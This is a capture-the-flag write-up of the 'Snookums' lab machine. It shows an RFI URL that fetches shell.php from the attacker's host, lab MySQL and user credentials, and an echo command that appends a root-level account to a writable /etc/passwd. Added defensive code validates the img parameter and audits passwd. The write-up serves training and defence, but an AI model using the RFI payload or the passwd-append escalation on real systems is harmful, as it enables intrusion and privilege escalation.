Snookums

Source: Proving Grounds | OS: Linux | Community Rating: Intermediate

Enumeration & Reconnaissance

  • Autorecon revealed open ports:

    • FTP (21)

    • SSH (22)

    • HTTP (80)

    • RPC (111)

    • SMB (139 & 445)

    • MySQL (3306 & 33060)

  • Usually, I’d check FTP first, especially since anonymous login was allowed, but I dove straight into HTTP (80) and got too involved to notice FTP until later.

Service Analysis

  • The HTTP server hosted a Simple PHP Photo Gallery (v0.8).

  • A version number at the bottom screamed "vulnerable." Searching for CVEs led me to EDB-ID 48424 (no CVE assigned), an RFI vulnerability in the img parameter:

http://192.168.192.58/image.php?img=http://192.168.45.201/shell.php
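The fix on the application side is to stop treating the img parameter as a path or URL at all. The following is an added example of that control, not code from Simple PHP Photo Gallery (the gallery's real directory layout and parameter handling are not shown in the write-up, so GALLERY_ROOT and the accepted extensions are assumptions): it accepts only a bare image file name and then confirms the resolved path stays under the gallery directory, so a remote URL, a stream-wrapper scheme, or a ../ sequence is rejected before any file is opened.

```python
import re
from pathlib import Path

# Assumed gallery directory for this example; the real application's layout is not known.
GALLERY_ROOT = Path("/srv/gallery-example/images")

# Allowlist: a plain file name with an image extension. No "/", no ":", no leading
# dot, so URLs, scheme: prefixes, absolute paths and ../ traversal never match.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.-]*\.(?:jpe?g|png|gif)$")


def resolve_gallery_image(img: str, root: Path = GALLERY_ROOT) -> Path:
    """Map the untrusted ?img= value to a file inside the gallery directory.

    Raises ValueError for anything that is not a simple image file name, and
    again if the resolved path would leave `root` (defence in depth: the regex
    already forbids separators, but the containment check does not rely on it).
    """
    if not _SAFE_NAME.fullmatch(img):
        raise ValueError(f"rejected img parameter: {img!r}")
    base = root.resolve(strict=False)
    candidate = (base / img).resolve(strict=False)
    if not candidate.is_relative_to(base):
        raise ValueError(f"path escapes gallery root: {img!r}")
    return candidate


def is_safe_img_param(img: str) -> bool:
    """True when resolve_gallery_image() would accept the value."""
    try:
        resolve_gallery_image(img)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed inputs: one legitimate name, plus the remote-include value
    # from the write-up and a traversal attempt, both of which must be refused.
    for value in ("cat.jpg", "http://192.168.45.201/shell.php", "../../etc/passwd", "shell.php"):
        print(f"{value!r:45} -> {'accepted' if is_safe_img_param(value) else 'rejected'}")
```

Because the allowlist is a file-name pattern rather than a denylist of schemes, new wrapper types or encodings do not need to be anticipated; anything that is not a plain image name fails closed.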

Gaining Initial Access

  • I crafted a PHP reverse shell and hosted it on my machine. Initial attempts with ports 901/9911 failed, likely firewall issues. Switching to ports 80/22 worked, and I landed a shell as apache.

  • Uploaded linpeas.sh, which flagged a PHP config file containing MySQL credentials: root:MalapropDoffUtilize1337.

mysql -u root -p
  • Found the SimplePHPGal database. It had a users table with 3 users alongside their encoded passwords; I picked the user michael since it was the one with a home directory.

echo "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==" | base64 -d | base64 -d
  • Decoding it gave HockSydneyCertify123.
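The two chained base64 -d calls work because the value was encoded twice. As an added example (not part of the original write-up), the function below generalises that: it keeps decoding while the result is still valid base64 that decodes to printable text, and stops one step before a plaintext that merely looks like base64 (HockSydneyCertify123 is 20 characters from the base64 alphabet, so a naive third decode would produce garbage). The only input taken from the write-up is the encoded string; the other samples are constructed.

```python
import base64
import binascii


def peel_base64(value: str, max_layers: int = 8) -> tuple[str, int]:
    """Repeatedly base64-decode `value` and return (innermost_text, layers_removed).

    Each layer must pass strict base64 validation and decode to printable UTF-8;
    the first layer that fails either check is left undecoded. max_layers guards
    against pathological inputs that keep decoding to base64-looking text.
    """
    current = value.strip()
    layers = 0
    while layers < max_layers:
        try:
            raw = base64.b64decode(current, validate=True)
            text = raw.decode("utf-8")
        except (binascii.Error, ValueError):  # bad alphabet/padding, or not UTF-8
            break
        if not text or not text.isprintable():
            break  # control bytes: we have gone one layer too far, keep `current`
        current = text.strip()
        layers += 1
    return current, layers


def decode_user_table(rows: dict[str, str]) -> dict[str, tuple[str, int]]:
    """Apply peel_base64 to every (user -> stored value) pair of a users table."""
    return {user: peel_base64(stored) for user, stored in rows.items()}


if __name__ == "__main__":
    # Constructed table: michael's value is the one from the write-up; the other
    # two rows are made up to show single-encoded and non-base64 values.
    sample_rows = {
        "michael": "U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==",
        "alice": "c2luZ2xlLWxheWVy",          # "single-layer", encoded once
        "bob": "plain-text-not-encoded!",     # "!" is outside the base64 alphabet
    }
    for user, (plain, layers) in decode_user_table(sample_rows).items():
        print(f"{user:8} layers={layers} value={plain!r}")
```

From a defender's side the same loop is useful in reverse: a credential store whose values peel down to printable text under base64 alone is storing reversible encodings, not password hashes, which is the real finding here.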


Privilege Escalation

  • I then switched to michael and re-ran linpeas.sh, which revealed writable /etc/passwd.

  • That means we can add a new user with UID 0, i.e. root privileges. I generated a password hash for "pwned":

openssl passwd pwned
  • Appended a new root user, kingkong, to /etc/passwd using echo:

echo "kingkong:\$1\$xr7pWWIR\$vNF8Z7sc8mgBu6u7ZETyT/:0:0:root:/root:/bin/bash" >> /etc/passwd
  • Switching to kingkong granted root access.
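The appended line leaves two durable traces: a second UID 0 account, and a password hash sitting in the second field of /etc/passwd instead of the usual "x" pointer to /etc/shadow. The following is an added detection example, not code from the write-up or from linpeas: it parses passwd content, flags both conditions (plus empty password fields and malformed entries), and checks the file mode for group/other write bits. The SAMPLE_PASSWD content is constructed, and its kingkong hash is a placeholder rather than the one from the box.

```python
import os
import stat
from dataclasses import dataclass

# Constructed /etc/passwd content: a normal system plus one appended UID 0 entry
# of the kind described above. The hash is a placeholder, not the real one.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
michael:x:1000:1000::/home/michael:/bin/bash
kingkong:$1$PLACEHOLDER$hashgoeshere:0:0:root:/root:/bin/bash
"""

# Values that legitimately appear in the password field when shadow is in use.
_NON_HASH_MARKERS = {"x", "*", "!", "!!"}


@dataclass
class Finding:
    line_no: int
    user: str
    reason: str


def audit_passwd(text: str) -> list[Finding]:
    """Return one Finding per suspicious passwd entry (empty list == clean)."""
    findings: list[Finding] = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(Finding(line_no, line, "malformed entry (expected 7 fields)"))
            continue
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        if uid == "0" and user != "root":
            findings.append(Finding(line_no, user, "extra UID 0 account"))
        if pw == "":
            findings.append(Finding(line_no, user, "empty password field (passwordless login)"))
        elif pw not in _NON_HASH_MARKERS:
            findings.append(Finding(line_no, user, "password hash stored in /etc/passwd, bypassing /etc/shadow"))
    return findings


def passwd_mode_is_safe(mode: int) -> bool:
    """True when neither group nor other has write permission (0644 or tighter)."""
    return not (mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_live(path: str = "/etc/passwd") -> tuple[bool, list[Finding]]:
    """Audit a real file: returns (mode_ok, content_findings)."""
    mode_ok = passwd_mode_is_safe(os.stat(path).st_mode)
    with open(path, encoding="utf-8") as fh:
        return mode_ok, audit_passwd(fh.read())


if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print(f"line {f.line_no}: {f.user}: {f.reason}")
    print("world/group-writable 0666 is safe?", passwd_mode_is_safe(0o100666))
```

The content checks are what a file-integrity monitor or a scheduled audit should alert on; the mode check is the preventive side, since the whole technique depends on the write bit being set for someone other than root.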


Lessons Learned

  • FTP Blindness: Skipping FTP might cost time; check obvious services first.

  • RFI Port Woes: Firewalls hate fancy ports; stick to 80/443 for shells.

  • Double Encoding: Always decode twice… or thrice.

  • /etc/passwd Write Abuse: If writable, plant a root user and call it a day.
